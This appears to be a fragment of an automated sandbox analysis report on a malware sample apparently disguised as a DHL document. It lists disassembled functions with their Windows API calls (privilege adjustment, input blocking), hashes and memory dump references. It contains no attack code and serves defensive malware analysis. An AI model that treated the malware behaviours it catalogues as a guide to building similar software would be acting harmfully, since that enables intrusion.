                                                                                      • Instruction ID: 58c7c151142fcbade6054568f2302e3c61d6002fb06dc13193f18b39192c8918
                                                                                      • Opcode Fuzzy Hash: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                                                                      • Instruction Fuzzy Hash: 01F01D7180424DABEF159FA0D805BAE7BB4FF04315F00801AF955A5191C77996119F94
                                                                                      Function 000910BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                                                                      • CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: dd5f1485fe56f97f6dafe1df809310653b40da8773a7b633720feca1c21233cb
                                                                                      • Instruction ID: 9726d31d16692d446cf91d00e164c386a7d9e8379784e045e86d961bd92d13ca
                                                                                      • Opcode Fuzzy Hash: dd5f1485fe56f97f6dafe1df809310653b40da8773a7b633720feca1c21233cb
                                                                                      • Instruction Fuzzy Hash: 23E0BF72014651AEF7252B51FC05EB777E9EB04311B24882DF5A6804B1DB626C90EB54
                                                                                      Function 0003CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Variable is not of type 'Object'., xrefs: 00080C40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable is not of type 'Object'.
                                                                                      • API String ID: 0-1840281001
                                                                                      • Opcode ID: 9abac74846656c8270c126fbf99b99d3cf5cb2a917640e31a74d1e0beb97965b
                                                                                      • Instruction ID: 276aa894707942c63ed27cb6aeb695aa7bd2cffabf56c056d04cf534c4843174
                                                                                      • Opcode Fuzzy Hash: 9abac74846656c8270c126fbf99b99d3cf5cb2a917640e31a74d1e0beb97965b
                                                                                      • Instruction Fuzzy Hash: 8F32AC74900218DFEF65EF94C881EEDB7B9BF05304F148069E846BB292DB75AE49CB50
                                                                                      Function 0006676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00066766,?,?,00000008,?,?,0006FEFE,00000000), ref: 00066998
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                                                                      • Instruction ID: 82c289e151f4f31c7b780caea2108a696b332f9d161759d20325bc0295797290
                                                                                      • Opcode Fuzzy Hash: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                                                                      • Instruction Fuzzy Hash: 14B14C31610608DFD755CF28C48AB697BE1FF45364F258658E89ACF2A2C736E991CB40
                                                                                      Function 0004B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                                                                      • Instruction ID: e1f9390d9f25e16bc1eb94143f27fdd5d8c46aff02e9e554b92427adaf45ad9f
                                                                                      • Opcode Fuzzy Hash: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                                                                      • Instruction Fuzzy Hash: 6C1250B19002299FDB64DF58C8806EEB7F5FF48710F5481AAE849EB251DB349E81CF94
                                                                                      Function 000AEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • BlockInput.USER32(00000001), ref: 000AEABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockInput
                                                                                      • String ID:
                                                                                      • API String ID: 3456056419-0
                                                                                      • Opcode ID: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                                                                      • Instruction ID: 0ede50adcfaecb5d9411b9ddadb8ff3bf4716b660c8580446f5e0bf718de675e
                                                                                      • Opcode Fuzzy Hash: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                                                                      • Instruction Fuzzy Hash: 70E01A362002049FD710EF99D804E9AB7EDAFA9760F00842AFD49DB351DA70AC408B91
                                                                                      Function 000509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000503EE), ref: 000509DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                                                                      • Instruction ID: 30439418e2658f28c5aae0a513585a5a54712a62a67685fcbd5bb606e5e02e31
                                                                                      • Opcode Fuzzy Hash: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 0005781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction ID: 9760d05a73ce98cd3e9533e2b73cc5d80217305d5b8fd789aca9d296cb7a17de
                                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction Fuzzy Hash: 7751477168C6055ADFB88568A85D7FF63C9DB52302F180509DC8ED7282CE16EE0DF362
                                                                                      Function 00066DD9 Relevance: .6, Instructions: 637COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                                                                      • Instruction ID: 2d8f93fdac0a7e798ccf80a6027b4fe8ccfa2aa728c4295cdb1e0be65b5a4207
                                                                                      • Opcode Fuzzy Hash: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                                                                      • Instruction Fuzzy Hash: 9E32F222D2AF414DE7239634DC22335A78AAFB73D9F15D737EC1AB59A5EB29C4834100
                                                                                      Function 0004CC39 Relevance: .6, Instructions: 635COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                                                                      • Instruction ID: ff493c746c60c608e6bd2add35e8e3227f13083571656b4574ca26703f00cfd7
                                                                                      • Opcode Fuzzy Hash: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                                                                      • Instruction Fuzzy Hash: 0E321171A002558BFFB8EA28C4D4EBC7BF1FB45314F28817AD5CA8B691D2309D81DB61
                                                                                      Function 00037920 Relevance: .6, Instructions: 563COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d97d630c1c055d4586033ef2542eb7c796ae5838da1ebcdad871513da954c2bd
                                                                                      • Instruction ID: 103e852e209d199b3090ec3182ee546c74fa52a62be9e9cefdb5be0dbb0de696
                                                                                      • Opcode Fuzzy Hash: d97d630c1c055d4586033ef2542eb7c796ae5838da1ebcdad871513da954c2bd
                                                                                      • Instruction Fuzzy Hash: E922B2B0E0460ADFDF25CF64C881AEEB3F5FF44301F108529E81AA7291EB79A955CB54
                                                                                      Function 000391C0 Relevance: .5, Instructions: 475COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63a700f514c1b14a2800b53d405d9bd8a4f51e6943ffd800d26c4f7199173c26
                                                                                      • Instruction ID: a39dfa5cd2237fd5ecc5c87f5bc7822f99e5edf4a54e8ecfa9a81c4a2e9cd014
                                                                                      • Opcode Fuzzy Hash: 63a700f514c1b14a2800b53d405d9bd8a4f51e6943ffd800d26c4f7199173c26
                                                                                      • Instruction Fuzzy Hash: 5202D8B0E00106EFDB15DF54D881AAEB7B5FF48300F11C169E81A9B291EB75EE11CB95
                                                                                      Function 00051C77 Relevance: .3, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction ID: e086eb4db394a85e079ec0a0296ec660d565ddfeca7436132be83485c0612334
                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction Fuzzy Hash: 7B9175321080A34ADB69463A85356BFFFF15B923A371A079DDCF2CA1C1EE20895CD620
                                                                                      Function 000519B0 Relevance: .2, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction ID: 3c22fd8e610a89ff0294d01a078be1ec849a3850666fc59a280ee7f0b25379bd
                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction Fuzzy Hash: 949159722090A349EB6E427A85741BFFFE15B923A371A079DD8F2CA1C1FE14C55CD620
                                                                                      Function 00057A4A Relevance: .2, Instructions: 237COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                                                                      • Instruction ID: 1c239922c3d26797c019bb7979dd0dd58b6d849e8d3d07f815208a87b5e22845
                                                                                      • Opcode Fuzzy Hash: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                                                                      • Instruction Fuzzy Hash: C661577160870956FAB49928B899BFF23D8DF81303F144919ED4EDB282DB119E4EF316
                                                                                      Function 00057CA7 Relevance: .2, Instructions: 237COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                                                                      • Instruction ID: 0974ede9832ee465892a7d7a63a0bbe8f64f14fc9af6c71efb813052626904df
                                                                                      • Opcode Fuzzy Hash: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                                                                      • Instruction Fuzzy Hash: BB615A7120870956DEB84928785ABBF23F8DF45703F104959EC4BDB282EA129D4EF365
                                                                                      Function 00051706 Relevance: .2, Instructions: 232COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction ID: 7da379901184674684e3663439507fe453b54dbc7ea72cad7aa46965708e76ad
                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction Fuzzy Hash: BC81547250D0A309DBA9423D85346BFFFE15F923A371A079DD8F2CA1C1EE24995CD620
                                                                                      Function 0117BF50 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction ID: 6569cf7d32ce67223eb4bcbdc5997e2c60c205031f17abb9bc60e433f81e79e7
                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction Fuzzy Hash: 0341C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                      Function 000A2046 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                                                                      • Instruction ID: 09edbdb4bc4fdd216f7a3e9914ef2cb1cb304785a4d519dae52ca4d7d8ee5d11
                                                                                      • Opcode Fuzzy Hash: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                                                                      • Instruction Fuzzy Hash: DF21B7326206118BD728CF79C823A7E73E5AB54310F15862EE4A7C37D1DE7AA944CB80
                                                                                      Function 0117BE40 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction ID: 0a4dd4fb006d553353d2ff9155e2812ff30119746deea2df57f537172ca6b74e
                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction Fuzzy Hash: DD019278A05109EFCB48DF98C5909AEF7B5FB48310F208599D909A7301D730AE41DB84
